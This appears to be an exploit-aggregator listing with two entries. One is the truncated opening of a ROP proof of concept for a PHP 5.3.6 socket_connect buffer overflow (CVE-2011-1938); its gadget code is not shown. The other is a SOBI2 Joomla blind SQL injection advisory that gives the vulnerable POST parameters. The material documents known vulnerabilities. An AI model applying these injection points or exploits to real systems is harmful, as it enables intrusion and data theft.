PHP 5.3.6 缓冲区溢出POC(ROP)的CVE - 2011 - 1938年

PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938 <?php /* ** Jonathan Salwan - @shell_storm ** http://shell-storm.org ** 2011-06-04 ** ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938 ** ** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c ** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary ** code via a long pathname for a UNIX socket. */ echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\n"; echo "[+] CVE-2011-1938\n\n"; # Gadgets in

SOBI2 2.9.3.2 Joomla! Component Blind SQL Injections

# Exploit Title: SOBI2 2.9.3.2 Joomla! Component Blind SQL Injections # Date: 13 July 2011 # Author: jdc # Version: 2.9.3.2 # Fixed In: 2.9.4 Versions prior to 2.9.4 suffer from a blind sql injection in both the "tag" and "letter" parameters. The request MUST reach the site with these parameters urlencoded for the injection to succeed.   POSTDATA: option=com_sobi2&tmpl=component&tag=[Encoded SQL] POSTDATA: option=com_sobi2&tmpl=component&letter=[Encoded SQL]